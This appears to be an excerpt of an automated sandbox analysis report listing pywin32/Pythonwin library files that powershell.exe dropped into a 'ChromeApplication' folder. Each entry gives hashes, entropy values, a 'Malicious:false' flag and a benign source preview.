                                                                                                                                                                                                  Entropy (8bit):4.9611604606840505
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:HiTUyF6H3cWLwv9K1N1eSA+sV5S3Z6osf+Z6RLvDI6Xvn:HMUDMZ1U/e5/vS3ZDzZ+LbIon
                                                                                                                                                                                                  MD5:57D70F791843C91E65EE5E218775EDED
                                                                                                                                                                                                  SHA1:2594F2BAAA48A797FF9867C014A05A48644181CA
                                                                                                                                                                                                  SHA-256:89566D4A8CA81DDCD291909915F4C521DF04C4F08BD6EA1E73AAED121487CB08
                                                                                                                                                                                                  SHA-512:C04319B0BB8387B6885414F5542F8550D895360A9B3537F580406EBB9DA1BC3BE38F08B6435A91FF4E071EF0E5B8BD23C11EC8DF298582E437CF04CC12B35F6E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Framework Window classes...# Most Pythonwin windows should use these classes rather than.# the raw MFC ones if they want Pythonwin specific functionality..import pywin.mfc.window.import win32con...class MDIChildWnd(pywin.mfc.window.MDIChildWnd):. def AutoRestore(self):. "If the window is minimised or maximised, restore it.". p = self.GetWindowPlacement(). if p[1] == win32con.SW_MINIMIZE or p[1] == win32con.SW_SHOWMINIMIZED:. self.SetWindowPlacement(p[0], win32con.SW_RESTORE, p[2], p[3], p[4]).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\winout.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20312
                                                                                                                                                                                                  Entropy (8bit):4.581654387141737
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:OgI9C73YcqsFayUTx2kLt8DJ/kZfuz/+cyyRO9VS8r9iRoohZrKq5tVIXCrU0ZFm:g6qdLtSQuz/HyyI3SoYrb5PFU0Z1xSr
                                                                                                                                                                                                  MD5:9EB4277350EB49CB90C442D49ECA0631
                                                                                                                                                                                                  SHA1:17493C9248F1769BC6072C26DE77A879D9B9A262
                                                                                                                                                                                                  SHA-256:4A47F88AAE5E5B212869FC60828C2B53CDE3DC4B1F11B49889B59F65938BA26F
                                                                                                                                                                                                  SHA-512:8A05409A206E39A73C173F50AE85E06747237D75F7DB752B54645271670D1FFF099519C57965DB7376CA5A1249D5DD949D21F9033956E559F3392C3848B7DFBA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# winout.py.#.# generic "output window".#.# This Window will detect itself closing, and recreate next time output is.# written to it...# This has the option of writing output at idle time (by hooking the.# idle message, and queueing output) or writing as each.# write is executed..# Updating the window directly gives a jerky appearance as many writes.# take place between commands, and the windows scrolls, and updates etc.# Updating at idle-time may defer all output of a long process, giving the.# appearence nothing is happening..# There is a compromise "line" mode, which will output whenever.# a complete line is available...# behaviour depends on self.writeQueueing..# This module is thread safe - output can originate from any thread. If any thread.# other than the main thread attempts to print, it is always queued until next idle time..import queue.import re..import win32api.import win32con.import win32ui.from pywin.framework import app, window.from pywin.mfc import docview..debug = la

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\idle\AutoExpand.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2714
                                                                                                                                                                                                  Entropy (8bit):4.1476646118507166
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:7vWXdGptGxEeDlKcX33TplsHcM6rqQEeySqsHYu5sy+RMJdNoPzeaqeL7gH2:tLGrXdaQqf6VoGlAgW
                                                                                                                                                                                                  MD5:3EB71BFBAA8E711E20947793841139C0
                                                                                                                                                                                                  SHA1:71088FBC63CD92116EF379E2FA903174B4C1E59B
                                                                                                                                                                                                  SHA-256:E965226123BDEF4C98961BBB5BA88083F4E95AE42A07C4EE9F05D9DC6D22F009
                                                                                                                                                                                                  SHA-512:46FA954AE4BD9BCE3446F6C472446DF8F18B6B562227087F5251BAADEEAEDCE9506B078BE686625EBFADEC3DDD02321E336632A59482BB418C123396881F6971
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import re.import string..###$ event <<expand-word>>.###$ win <Alt-slash>.###$ unix <Alt-slash>...class AutoExpand:. keydefs = {. "<<expand-word>>": ["<Alt-slash>"],. }.. unix_keydefs = {. "<<expand-word>>": ["<Meta-slash>"],. }.. menudefs = [. (. "edit",. [. ("E_xpand word", "<<expand-word>>"),. ],. ),. ].. wordchars = string.ascii_letters + string.digits + "_".. def __init__(self, editwin):. self.text = editwin.text. self.text.wordlist = None # XXX what is this?. self.state = None.. def expand_word_event(self, event):. curinsert = self.text.index("insert"). curline = self.text.get("insert linestart", "insert lineend"). if not self.state:. words = self.getwords(). index = 0. else:. words, index, insert, line = self.state. if insert != curinsert or line != curline:. words = self

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\idle\AutoIndent.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20682
                                                                                                                                                                                                  Entropy (8bit):4.252065700758349
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kRBIJcF+o2ERXDljJwNBGsTACLu09QQhpyviqR66AARcTNh:kRqaDxDVJSACGR66AFh
                                                                                                                                                                                                  MD5:DC3B0E008D701AB5D77BDDB4A99F2046
                                                                                                                                                                                                  SHA1:424295FB0EF10C3677A893C6FAE6550A78D824FC
                                                                                                                                                                                                  SHA-256:8D0E00FAF18D7CDECFE4BB2C6961DB8DFBE73ED829042558B7A2AF59C8020DD8
                                                                                                                                                                                                  SHA-512:611A18CEEECEFFD56F02DFF50A4331EB09DFC2DA7805CCD28B8775EBCB4CCB2565BA23B5221C3EB8F517E5161A8EBEA8EADD978A880E284F550C6E76D908447F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import sys.import tokenize..from pywin import default_scintilla_encoding..from . import PyParse..if sys.version_info < (3,):. # in py2k, tokenize() takes a 'token eater' callback, while. # generate_tokens is a generator that works with str objects.. token_generator = tokenize.generate_tokens.else:. # in py3k tokenize() is the generator working with 'byte' objects, and. # token_generator is the 'undocumented b/w compat' function that. # theoretically works with str objects - but actually seems to fail). token_generator = tokenize.tokenize...class AutoIndent:. menudefs = [. (. "edit",. [. None,. ("_Indent region", "<<indent-region>>"),. ("_Dedent region", "<<dedent-region>>"),. ("Comment _out region", "<<comment-region>>"),. ("U_ncomment region", "<<uncomment-region>>"),. ("Tabify region", "<<tabify-region>>"),. ("Untabify region",

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\idle\CallTips.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6372
                                                                                                                                                                                                  Entropy (8bit):4.331987781000828
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:lbcnr/2NIhNSk8NLN7r77rUsgMuEB83xoCBs5qqsbAgVI/FnNn:lvSq5nLU7nqgov0kNNn
                                                                                                                                                                                                  MD5:8E4C2D3EBA3C17961CA827664F893BCF
                                                                                                                                                                                                  SHA1:E4C8E37C90E02158FEC807C433912043F7DA95E8
                                                                                                                                                                                                  SHA-256:3A3454E10F5519974B2E257DB21ECEF56113ED7E749E05D7BEAA9DEFA29C3088
                                                                                                                                                                                                  SHA-512:BD9DC7F1D8CE86BCC50DC80F75154F7540784DDAD55C62626FAEE2AB8D6367A0ECE4F22F559ACBEB0381FAE97B7B1F10320C3C4005B7EFF68B8619D5E38C35DE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# CallTips.py - An IDLE extension that provides "Call Tips" - ie, a floating window that.# displays parameter information as you open parens...import inspect.import string.import sys.import traceback...class CallTips:. menudefs = [].. keydefs = {. "<<paren-open>>": ["<Key-parenleft>"],. "<<paren-close>>": ["<Key-parenright>"],. "<<check-calltip-cancel>>": ["<KeyRelease>"],. "<<calltip-cancel>>": ["<ButtonPress>", "<Key-Escape>"],. }.. windows_keydefs = {}.. unix_keydefs = {}.. def __init__(self, editwin):. self.editwin = editwin. self.text = editwin.text. self.calltip = None. if hasattr(self.text, "make_calltip_window"):. self._make_calltip_window = self.text.make_calltip_window. else:. self._make_calltip_window = self._make_tk_calltip_window.. def close(self):. self._make_calltip_window = None.. # Makes a Tk based calltip window. Used by IDLE, but not Pythonwin.. # S

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\idle\FormatParagraph.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5727
                                                                                                                                                                                                  Entropy (8bit):4.394603822126328
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:5JDTx9FYoxvd46boQCPDvMX/+xCeRHdAi+gXFA0xl/yk/yd/aQ:T66vztpXGxCeRHdRtFAml6k6dCQ
                                                                                                                                                                                                  MD5:3CF25A5E5CB7402B113937BDAB4CC1B9
                                                                                                                                                                                                  SHA1:E357FC507FDBFA7C2D5DB9FAB73DAA6A4CFF6B5A
                                                                                                                                                                                                  SHA-256:C7809EB50F1FCF8F85E3D0867924DF2047FE121F13CF526CEBCB1401466BBCCD
                                                                                                                                                                                                  SHA-512:D51C0CE656C2A2A37DF6FBA135C3E3B9066F42626C722267D38C677D2BD591C6C8AC59CDB4AEBB4FBA444C0AEC9062FE333B598E61062EC6B6A6BD1B0F8F23B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Extension to format a paragraph..# Does basic, standard text formatting, and also understands Python.# comment blocks. Thus, for editing Python source code, this.# extension is really only suitable for reformatting these comment.# blocks or triple-quoted strings...# Known problems with comment reformatting:.# * If there is a selection marked, and the first line of the.# selection is not complete, the block will probably not be detected.# as comments, and will have the normal "text formatting" rules.# applied..# * If a comment block has leading whitespace that mixes tabs and.# spaces, they will not be considered part of the same block..# * Fancy comments, like this bulleted list, arent handled :-)..import re...class FormatParagraph:. menudefs = [. (. "edit",. [. ("Format Paragraph", "<<format-paragraph>>"),. ],. ). ].. keydefs = {. "<<format-paragraph>>": ["<Alt-q>"],. }.. unix_keydefs = {.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\idle\IdleHistory.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3069
                                                                                                                                                                                                  Entropy (8bit):4.1340413851981355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:WI0VjbvYV2MFTxMYlSqp/sNXQp/A7d/XdifpdUB6zDOngrQ6B+w:7InF2NfjW8A75XdiRdaADOgEs+w
                                                                                                                                                                                                  MD5:B815FCA1AF9503A92419F20246D48ABD
                                                                                                                                                                                                  SHA1:1CB99DA007989D2EA3269A85486EFF1DAF3D8F2E
                                                                                                                                                                                                  SHA-256:BCE4E7E672276D01D69ED79C7ED1D9F5889006AD6B3FBAC602CAC9B355BC0947
                                                                                                                                                                                                  SHA-512:619BFF443025CE7D70EF72DC84F1CC68EB3E6F0F80B8A129F132C49C025AD9C9E82D4B0B892B75C789E80CB4FD593A7090747F8D66E135C3F870D87DDDC80B1B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:class History:. def __init__(self, text, output_sep="\n"):. self.text = text. self.history = []. self.history_prefix = None. self.history_pointer = None. self.output_sep = output_sep. text.bind("<<history-previous>>", self.history_prev). text.bind("<<history-next>>", self.history_next).. def history_next(self, event):. self.history_do(0). return "break".. def history_prev(self, event):. self.history_do(1). return "break".. def _get_source(self, start, end):. # Get source code from start index to end index. Lines in the. # text control may be separated by sys.ps2 .. lines = self.text.get(start, end).split(self.output_sep). return "\n".join(lines).. def _put_source(self, where, source):. output = self.output_sep.join(source.split("\n")). self.text.insert(where, output).. def history_do(self, reverse):. nhist = len(self.history). pointer =

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\idle\PyParse.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18492
                                                                                                                                                                                                  Entropy (8bit):4.094627670715275
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kDSC3LGcWXNFHTMX+G/54PXcbXS/4/2ezRp8CRbJbl31Ia7If5I41e4/IAL3/0kh:kDfq3fpG/5+XcbXS/4/2ezhbJbef5I4V
                                                                                                                                                                                                  MD5:2881726294DCF58E56EFB900C5A0F8D3
                                                                                                                                                                                                  SHA1:DAB83CA4EC35577579E0DA320A0230D985640A9A
                                                                                                                                                                                                  SHA-256:43F04DAAC0C47DCA9A7B2507B1445BA876DEBF73B658F7F62D0A0E44B6666196
                                                                                                                                                                                                  SHA-512:C65C12AFA7085229E6C391F1C565087AD09145AD80E5E7D213E1EDEA269202CC695E614126B861EB4F928E8210A88DE75F5FF5C20E775EF4C585B0345720E51E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import re.import string.import sys..# Reason last stmt is continued (or C_NONE if it's not)..C_NONE, C_BACKSLASH, C_STRING, C_BRACKET = list(range(4))..if 0: # for throwaway debugging output.. def dump(*stuff):. sys.__stdout__.write(" ".join(map(str, stuff)) + "\n")...# Find what looks like the start of a popular stmt..._synchre = re.compile(. r""". ^. [ \t]*. (?: if. | for. | while. | else. | def. | return. | assert. | break. | class. | continue. | elif. | try. | except. | raise. | import. ). \b.""",. re.VERBOSE | re.MULTILINE,.).search..# Match blank line or non-indenting comment line..._junkre = re.compile(. r""". [ \t]*. (?: \# \S .* )?. \n.""",. re.VERBOSE,.).match..# Match any flavor of string; the terminating quote is optional.# so that we're robust in the face of incomplete program text..._match_stringre = re.compile(. r""". \""" [^"\\]* (?:.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\idle\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                  Entropy (8bit):4.162111531234448
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SbFQyA+AFRGHWkexVWSvn:SbFW+bHWkcVjv
                                                                                                                                                                                                  MD5:C2A467B129816CF02C12519E3E45DB0A
                                                                                                                                                                                                  SHA1:49D83D6E76EA862B9885CD4E0F4FD721DCF1F79A
                                                                                                                                                                                                  SHA-256:44B1DF947FF50D72D59B94198997B704164F45A1CD53FEFA952A8E17E3547F84
                                                                                                                                                                                                  SHA-512:AA54B67FB7B539616B131EC081FE27B0C7E3684490C19028226BA37760E6FB63BA7C1D6D814BFFA613C43A0EDAC655EF305CF09EC2A52D88FE916E7BFBD3D602
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This file denotes the directory as a Python package..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\mfc\activex.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2868
                                                                                                                                                                                                  Entropy (8bit):4.593442899717496
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:wIUyrO+52aUrxTZzEkAOQlypxbGb72X95xqqliH2afGjfPYX5DWT4yQl7c8GH9:rUqUrx1RAOtXqeNK8iWaaXYXtU4ySoX9
                                                                                                                                                                                                  MD5:33A3FC76024153A2C91464ECF67B48D7
                                                                                                                                                                                                  SHA1:B351FE1B5981AC4BC64B310C84ACD913A9FB18CF
                                                                                                                                                                                                  SHA-256:786CD903AAD80332EEC07026AA0289776BEBCDE5A8B05086902054D782D46B6A
                                                                                                                                                                                                  SHA-512:6853C668A08B4BE27DEA2D2CF6D83F07DCF80AF3BCB398D3183A4983584165ECF7E9BA2EFEB156CA61F93986132AD4900DF18858FDB3BEC9D7B9584212071FF1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Support for ActiveX control hosting in Pythonwin..""".import win32ui.import win32uiole..from . import window..# XXX - we are still "classic style" classes in py2x, so we need can't yet.# use 'type()' everywhere - revisit soon, as py2x will move to new-style too....try:. from types import ClassType as new_type.except ImportError:. new_type = type # py3k...class Control(window.Wnd):. """An ActiveX control base class. A new class must be derived from both. this class and the Events class. See the demos for more details.. """.. def __init__(self):. self.__dict__["_dispobj_"] = None. window.Wnd.__init__(self).. def _GetControlCLSID(self):. return self.CLSID.. def _GetDispatchClass(self):. return self.default_interface.. def _GetEventMap(self):. return self.default_source._dispid_to_func_.. def CreateControl(self, windowTitle, style, rect, parent, id, lic_string=None):. clsid = str(self._GetControlCLSID()).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\mfc\afxres.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15094
                                                                                                                                                                                                  Entropy (8bit):4.777558868848426
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:p9+7gM0XJNbpbCffiskBtXvyhE+RjE5LedEIq0E1G+fe:pJNlCff8yxjE5LI4v1A
                                                                                                                                                                                                  MD5:370BEB77C36C0B2E840E6AB850FCE757
                                                                                                                                                                                                  SHA1:0A87A029CA417DAA03D22BE6EDDFDDBAC0B54D7A
                                                                                                                                                                                                  SHA-256:462659F2891D1D767EA4E7A32FC1DBBD05EC9FCFA9310ECDC0351B68F4C19ED5
                                                                                                                                                                                                  SHA-512:4E274071CA052CA0D0EF5297D61D06914F0BFB3161843B3CDCFDE5A2EA0368974FD2209732A4B00A488C84A80A5AB94AD4FD430FF1E4524C6425BAA59E4DA289
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generated by h2py from stdin.TCS_MULTILINE = 0x0200.CBRS_ALIGN_LEFT = 0x1000.CBRS_ALIGN_TOP = 0x2000.CBRS_ALIGN_RIGHT = 0x4000.CBRS_ALIGN_BOTTOM = 0x8000.CBRS_ALIGN_ANY = 0xF000.CBRS_BORDER_LEFT = 0x0100.CBRS_BORDER_TOP = 0x0200.CBRS_BORDER_RIGHT = 0x0400.CBRS_BORDER_BOTTOM = 0x0800.CBRS_BORDER_ANY = 0x0F00.CBRS_TOOLTIPS = 0x0010.CBRS_FLYBY = 0x0020.CBRS_FLOAT_MULTI = 0x0040.CBRS_BORDER_3D = 0x0080.CBRS_HIDE_INPLACE = 0x0008.CBRS_SIZE_DYNAMIC = 0x0004.CBRS_SIZE_FIXED = 0x0002.CBRS_FLOATING = 0x0001.CBRS_GRIPPER = 0x00400000.CBRS_ORIENT_HORZ = CBRS_ALIGN_TOP | CBRS_ALIGN_BOTTOM.CBRS_ORIENT_VERT = CBRS_ALIGN_LEFT | CBRS_ALIGN_RIGHT.CBRS_ORIENT_ANY = CBRS_ORIENT_HORZ | CBRS_ORIENT_VERT.CBRS_ALL = 0xFFFF.CBRS_NOALIGN = 0x00000000.CBRS_LEFT = CBRS_ALIGN_LEFT | CBRS_BORDER_RIGHT.CBRS_TOP = CBRS_ALIGN_TOP | CBRS_BORDER_BOTTOM.CBRS_RIGHT = CBRS_ALIGN_RIGHT | CBRS_BORDER_LEFT.CBRS_BOTTOM = CBRS_ALIGN_BOTTOM | CBRS_BORDER_TOP.SBPS_NORMAL = 0x0000.SBPS_NOBORDERS = 0x0100.SBPS_POPOUT = 0x0200.SB

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\mfc\dialog.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9002
                                                                                                                                                                                                  Entropy (8bit):4.653477006452847
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:tmY8+q9G2PjQnqrLsDsOqDs+Yg0Mxpb0Xh4hwWIc:tmEwG2PjQnqs6Nih47
                                                                                                                                                                                                  MD5:12BC3CDBB2F36846A76A43060AFB93DA
                                                                                                                                                                                                  SHA1:94BB0F8D3EFCC2873BEEA25253551696662DDDFC
                                                                                                                                                                                                  SHA-256:1343399262F87394D38ADCCB5C6A2A7B999C41FC48AFD4D1F890140DB250F2D9
                                                                                                                                                                                                  SHA-512:57C7855DFA87487F55DB9D5D312CE89827B5E9F26642FC89A59F5B389E16D777F5CD49D07ACC67CF9578E36BF56C11097062E7180CB2C8C785DF1BE53AEBFBB6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" \.Base class for Dialogs. Also contains a few useful utility functions.""".# dialog.py.# Python class for Dialog Boxes in PythonWin...import win32con.import win32ui..# sob - 2to3 doesn't see this as a relative import :(.from pywin.mfc import window...def dllFromDll(dllid):. "given a 'dll' (maybe a dll, filename, etc), return a DLL object". if dllid == None:. return None. elif type("") == type(dllid):. return win32ui.LoadLibrary(dllid). else:. try:. dllid.GetFileName(). except AttributeError:. raise TypeError("DLL parameter must be None, a filename or a dll object"). return dllid...class Dialog(window.Wnd):. "Base class for a dialog".. def __init__(self, id, dllid=None):. """id is the resource ID, or a template. dllid may be None, a dll object, or a string with a dll name""". # must take a reference to the DLL until InitDialog.. self.dll = dllFromDll(dllid). if type(id) ==

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\mfc\docview.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4089
                                                                                                                                                                                                  Entropy (8bit):4.654928602298063
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:tqu76lDV5Kb5/65Ab5i5PSbnrmAY3UrrWEnSSiWsYVBvw+XuMWwJYMExXNO:dExNO
                                                                                                                                                                                                  MD5:8791456FD7D550ECF2F6D9A49EBB55E5
                                                                                                                                                                                                  SHA1:6617C832DE99E3566A83B38640BF9C36B8908BA9
                                                                                                                                                                                                  SHA-256:30EAC40A598F11C20A0BA1008674651070D4FF7CC621F16F57C598D8CDBA52D9
                                                                                                                                                                                                  SHA-512:75C9DAE3DEDCBA988B5708AEB9DB717449F0BFAEB4916A2F0E1EC478CDC0EDEC57F52852693DD1140745C91C523F64AF154651E7F5DBE2F07A630826E5752627
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# document and view classes for MFC..import win32ui..from . import object, window...class View(window.Wnd):. def __init__(self, initobj):. window.Wnd.__init__(self, initobj).. def OnInitialUpdate(self):. pass...# Simple control based views..class CtrlView(View):. def __init__(self, doc, wndclass, style=0):. View.__init__(self, win32ui.CreateCtrlView(doc, wndclass, style))...class EditView(CtrlView):. def __init__(self, doc):. View.__init__(self, win32ui.CreateEditView(doc))...class RichEditView(CtrlView):. def __init__(self, doc):. View.__init__(self, win32ui.CreateRichEditView(doc))...class ListView(CtrlView):. def __init__(self, doc):. View.__init__(self, win32ui.CreateListView(doc))...class TreeView(CtrlView):. def __init__(self, doc):. View.__init__(self, win32ui.CreateTreeView(doc))...# Other more advanced views..class ScrollView(View):. def __init__(self, doc):. View.__init__(self, win32ui.CreateView(

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\mfc\object.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2179
                                                                                                                                                                                                  Entropy (8bit):4.386077735543855
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:qAibk/bJALTEZu2CSfkN3KylseLVWLLNHLIKaNBKANAFG9bxIXGEs9bxI8EUds9h:qhA/t6n2CEeakP4TnEcGUGNz9dsR6C
                                                                                                                                                                                                  MD5:BE71EA2BF0C288E3AA3A2E30C08DF3E5
                                                                                                                                                                                                  SHA1:40E4B56C7DFF8623572D639D944C096C84E8B8F8
                                                                                                                                                                                                  SHA-256:2BB20C2218306A176B063BC860092852EA94186F385815F3E07388033CC69F1A
                                                                                                                                                                                                  SHA-512:A0DDA0B0A790E385FB0BE69659FB97D9645A3208C08E07400284C81F5CACE190AD115DAC8350133BA445E53AC0AFD686980274A70148CF376D46AAB3D9CF4784
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# MFC base classes...import win32ui...class Object:. def __init__(self, initObj=None):. self.__dict__["_obj_"] = initObj. # ..self._obj_ = initObj. if initObj is not None:. initObj.AttachObject(self).. def __del__(self):. self.close().. def __getattr__(. self, attr. ): # Make this object look like the underlying win32ui one.. # During cleanup __dict__ is not available, causing recursive death.. if not attr.startswith("__"):. try:. o = self.__dict__["_obj_"]. if o is not None:. return getattr(o, attr). # Only raise this error for non "internal" names -. # Python may be calling __len__, __nonzero__, etc, so. # we dont want this exception. if attr[0] != "_" and attr[-1] != "_":. raise win32ui.error("The MFC object has died."). except KeyError:. # No _obj_

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\mfc\thread.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):588
                                                                                                                                                                                                  Entropy (8bit):4.556501995844858
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:GIALHr171Ap0ZbZMiQlApOAgab6QAtqI1Ap9wyCeVAApn:G/1hAiZbZMiQlA9biqMAoyCKAAd
                                                                                                                                                                                                  MD5:CFE2192D3AEFC770DCF8AF46489267F6
                                                                                                                                                                                                  SHA1:7FE1659F61EA201667A114911ECBBE08DC9667D4
                                                                                                                                                                                                  SHA-256:CA5B09C8E52F81F206DC58C631605F915229B034038C7900B527E3DD7CF3AB33
                                                                                                                                                                                                  SHA-512:9A6BF373CFA64D3F3A96CB228DA1EA15F9CB6E5D9106515BB6AEE9E8C5C4E406142199636FA07C44AFFC25A7D704CBDCC7BF0C3745E0BC40DE7850C25B6F97F8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Thread and application objects..import win32ui..from . import object...class WinThread(object.CmdTarget):. def __init__(self, initObj=None):. if initObj is None:. initObj = win32ui.CreateThread(). object.CmdTarget.__init__(self, initObj).. def InitInstance(self):. pass # Default None/0 return indicates success for InitInstance().. def ExitInstance(self):. pass...class WinApp(WinThread):. def __init__(self, initApp=None):. if initApp is None:. initApp = win32ui.GetApp(). WinThread.__init__(self, initApp).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\CopyFileEx.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1243
                                                                                                                                                                                                  Entropy (8bit):5.026032254838223
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:q+5UyeJ0El1Sa1g5SaqpWSnmnVuqidsgxExyYJXYathSy4rXG/iwS:eyfsytM5nmnVuTdsgRcXZ77PiH
                                                                                                                                                                                                  MD5:23B53C129F0FD220900CB00417719477
                                                                                                                                                                                                  SHA1:49432AFCED130D2038A15E2B8A71CF8B3B06150F
